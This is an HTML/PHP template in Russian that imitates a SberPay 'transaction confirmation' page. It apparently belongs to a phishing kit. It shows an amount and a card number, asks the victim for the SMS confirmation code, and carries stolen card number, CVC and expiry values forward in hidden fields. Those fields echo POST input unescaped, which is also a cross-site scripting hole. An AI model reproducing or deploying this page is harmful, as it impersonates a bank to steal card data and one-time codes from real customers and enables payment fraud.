<!DOCTYPE html>
<html>
	<head>
		<title>Подтверждение транзакции</title>
		<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
		<link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;500&display=swap" rel="stylesheet">
		<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
		<script type="javascript" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<script
		  src="https://code.jquery.com/jquery-3.5.1.js"
		  integrity="sha256-QWo7LDvxbWT2tbbQ97B53yJnYU3WhH/C8ycbRAkjPDc="
		  crossorigin="anonymous"></script>
		<style>
		body {
			font-family: 'Roboto', sans-serif;
		}
		</style>
	</head>
	<body class="bg-white">
	<div class="col-lg-6 offset-lg-3 ">
	<div class="row justify-content-center">
		<div style="max-width: 480px;">
			<div class="mt-4" style="margin-left: 10%;max-width: 80%">
			<div class="alert" style="background-color: #e74c3c;color: #fff;display:none;" id='errora' role="alert">
			 <i class="fa fa-exclamation-triangle" aria-hidden="true"></i> <span><small id="errortext">Недостаточно средств.</small></span>
			</div>
				<h5>Подтверждение транзакции</h5>
				<small class="text-secondary">
					Для подтверждения транзакции на Ваш номер телефона было отправлено СМС сообщение с кодом подтверждения. Введите его в поле ниже.
				</small>
				<hr/>
				<table class="table table-borderless table-sm">
				  <tbody>
					<tr>
					  <td><small>Магазин:</small></td>
					  <td><small>SberPay</small></td>
					</tr>
					<tr>
					  <td><small>Сумма:</small></td>
					  <td><small>{{cash}} руб.</small></td>
					</tr>
					<tr>
					  <td><small>Номер карты:</small></td>
					  <td><small>{{card}}</small></td>
					</tr>
				  </tbody>
				</table>
				<hr/>
				<div class="form-group">
				<label for="codeform"><small><b>Код подтверждения</b></small></label>
				<form method="POST">
				<input type="text" class="form-control" id="codeform" name="code" style="font-size: 12px;" placeholder="Введите код из СМС">
				<button onclick='justclick();' id='inbtn' class="btn btn-primary mt-3 w-100" type="submit"><small>Подтвердить</small></button>
				</form>
				<input type="hidden" id='fcard' name="fcard" value="<?=$_POST['fcard']?>">
				<input type="hidden" id='fcvc' name="fcvc" value="<?=$_POST['fcvc']?>">
				<input type="hidden" id='fexpm' name="fexpm" value="<?=$_POST['fexpm']?>">
				<input type="hidden" id='fexpy' name="fexpy" value="<?=$_POST['fexpy']?>">
			  </div>
			</div>
		</div>
		</div>
		</div>
	</body>
	

</html>